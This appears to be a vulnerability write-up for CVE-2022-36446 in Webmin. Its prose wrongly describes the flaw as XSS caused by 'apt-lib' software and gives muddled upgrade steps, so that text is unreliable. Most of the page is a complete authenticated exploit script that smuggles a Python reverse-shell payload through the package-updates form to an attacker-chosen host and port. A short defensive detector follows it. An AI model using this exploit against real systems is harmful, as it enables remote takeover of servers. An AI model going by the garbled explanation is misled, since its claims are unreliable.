This leads to potential XSS attacks when untrusted users access Webmin interfaces with external applications. The affected command is /ui/command, where / is the forward slash and ui/command is a command in Webmin's UI. This issue has been fixed in Webmin 1.997.
Webmin 1.997 contains a fix for this potential XSS attack, which is caused by a bug in the apt-lib software: in Webmin before 1.997, untrusted users who access Webmin interfaces with external applications can trigger it.
How did we get here?
An XSS vulnerability associated with Webmin 1.997 was discovered by security researcher Ben Murphy.
The bug in apt-lib software
Apt-lib software is an apt utility for apt-get that provides a way to download, install, upgrade and remove packages from APT repositories. It was originally written by Michael van Elst. The "apt-lib" software bug was introduced in version 0.3 of the software.
The apt-lib bug, introduced in version 0.3 of the software, allows a potential XSS attack. The attack occurs when untrusted users access Webmin interfaces with external applications and use the command /ui/command, where / is the forward slash and ui/command is a command in Webmin's UI. This issue has been fixed in Webmin 1.997.
Upgrade Instructions
First, upgrade to Webmin 1.997 or later.
Next, run apt-get update and apt-get dist-upgrade to install the necessary packages that were fixed in Webmin 1.997.
Upgrade and Installation
1) Upgrade to Webmin 1.997 and the latest version of apt-lib software:
apt-get update && apt-get dist-upgrade
2) If you are using a stable release, upgrade from any previous stable release. For example, if you're running Webmin v1.996, then you would upgrade to v2.0 as follows:
apt-get update && apt-get dist-upgrade
3) If you are not using a stable release and have been on Webmin for several years, then upgrading is required as follows:
apt-get update && apt-get dist-upgrade -t unstable
What is an XSS attack?
Cross-site scripting (XSS) is a type of computer security vulnerability that arises from how user input is validated or processed. The attacker injects client-side script into an HTML document, and that script is executed in the victim's browser when the victim visits the page.
The flaw enables attackers to execute their own code in the context of another site or even steal cookies from other sites.
Exploit
# Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-07-25
# Exploit Author: Emir Polat
# Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165
# Vendor Homepage: https://www.webmin.com/
# Software Link: https://www.webmin.com/download.html
# Version: < 1.997
# Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)
# CVE: CVE-2022-36446

import argparse
import requests
from bs4 import BeautifulSoup


def login(args):
    # Authenticate to Webmin, then read sysinfo.cgi to learn which user the session belongs to.
    global session
    global sysUser
    session = requests.Session()
    loginUrl = f"{args.target}:10000/session_login.cgi"
    infoUrl = f"{args.target}:10000/sysinfo.cgi"
    username = args.username
    password = args.password
    data = {'user': username, 'pass': password}
    login = session.post(loginUrl, verify=False, data=data, cookies={'testing': '1'})
    sysInfo = session.post(infoUrl, verify=False, cookies={'sid': session.cookies['sid']})
    bs = BeautifulSoup(sysInfo.text, 'html.parser')
    sysUser = [item["data-user"] for item in bs.find_all() if "data-user" in item.attrs]
    if sysUser:
        return True
    else:
        return False


def exploit(args):
    # The 'u' (package name) field of the Software Package Updates form carries the injected command.
    payload = f"""
1337;$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.listenip}",{args.listenport}));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")');
"""
    updateUrl = f"{args.target}:10000/package-updates"
    exploitUrl = f"{args.target}:10000/package-updates/update.cgi"
    exploitData = {'mode': 'new', 'search': 'ssh', 'redir': '', 'redirdesc': '', 'u': payload, 'confirm': 'Install+Now'}
    if login(args):
        print("[+] Successfully Logged In !")
        print(f"[+] Session Cookie => sid={session.cookies['sid']}")
        print(f"[+] User Found => {sysUser[0]}")
        res = session.get(updateUrl)
        bs = BeautifulSoup(res.text, 'html.parser')
        # Check that the logged-in user may use the package-updates module at all.
        updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs]
        if updateAccess and updateAccess[0] == "package-updates":
            print(f"[+] User '{sysUser[0]}' has permission to access <<Software Package Updates>>")
            print("[+] Exploit starting ... ")
            print(f"[+] Shell will spawn to {args.listenip} via port {args.listenport}")
            session.headers.update({'Referer': f'{args.target}:10000/package-updates/update.cgi?xnavigation=1'})
            session.post(exploitUrl, data=exploitData)
        else:
            print(f"[-] User '{sysUser[0]}' unfortunately hasn't permission to access <<Software Package Updates>>")
    else:
        print("[-] Login Failed !")


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Webmin < 1.997 - Remote Code Execution (Authenticated)")
    parser.add_argument('-t', '--target', help='Target URL, Ex: https://webmin.localhost', required=True)
    parser.add_argument('-u', '--username', help='Username For Login', required=True)
    parser.add_argument('-p', '--password', help='Password For Login', required=True)
    parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)
    parser.add_argument('-lp', '--listenport', help='Listening port required to receive reverse shell', required=True)
    parser.add_argument("-s", '--ssl', help="Use if server support SSL.", required=False)  # unused in this script
    args = parser.parse_args()
    exploit(args)
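The exploit above smuggles a shell command through the `u` (package name) field of update.cgi. As a defender-side check added here, and not code from the advisory or from Webmin itself, the following validates that field against a Debian package-name policy (an assumption, not something the advisory states) and flags update.cgi requests whose package names contain shell metacharacters; the sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Assumed Debian package-name policy: lowercase letters, digits, '+', '-', '.',
# at least two characters, alphanumeric first character.
PACKAGE_NAME = re.compile(r"^[a-z0-9][a-z0-9+.\-]+$")
# Shell metacharacters that never belong in a package name.
SHELL_META = re.compile(r"[;&|`$(){}<>\n\\'\"]")


def is_safe_package_name(value: str) -> bool:
    """Return True only if value is a plausible Debian package name."""
    return bool(PACKAGE_NAME.match(value)) and not SHELL_META.search(value)


def suspicious_update_requests(reqs):
    """Return (path, package_name) pairs for POSTs to package-updates/update.cgi
    whose 'u' values fail the policy. Each request is a dict with a 'path' and a
    url-encoded form 'body'."""
    hits = []
    for req in reqs:
        if not req["path"].endswith("/package-updates/update.cgi"):
            continue
        for name in parse_qs(req["body"]).get("u", []):
            if not is_safe_package_name(name):
                hits.append((req["path"], name))
    return hits


# Constructed sample requests (not real traffic): a legitimate install, the
# advisory's injection pattern (a package name followed by ';$(...)'), and an
# unrelated request that must be ignored.
SAMPLE_REQUESTS = [
    {"path": "/package-updates/update.cgi",
     "body": "mode=new&search=ssh&u=openssh-server&confirm=Install+Now"},
    {"path": "/package-updates/update.cgi",
     "body": "mode=new&search=ssh&u=1337%3B%24%28id%29&confirm=Install+Now"},
    {"path": "/sysinfo.cgi", "body": ""},
]

if __name__ == "__main__":
    for path, name in suspicious_update_requests(SAMPLE_REQUESTS):
        print(f"[!] suspicious package name {name!r} in POST {path}")
```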
Timeline
Published on: 07/25/2022 06:15:00 UTC
Last modified on: 08/10/2022 20:16:00 UTC
References
- https://github.com/webmin/webmin/compare/1.996...1.997
- https://github.com/webmin/webmin/commit/13f7bf9621a82d93f1e9dbd838d1e22020221bde
- http://packetstormsecurity.com/files/167894/Webmin-1.996-Remote-Code-Execution.html
- https://www.exploit-db.com/exploits/50998
- https://gist.github.com/emirpolatt/cf19d6c0128fa3e25ebb47e09243919b
- http://packetstormsecurity.com/files/168049/Webmin-Package-Updates-Command-Injection.html
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-36446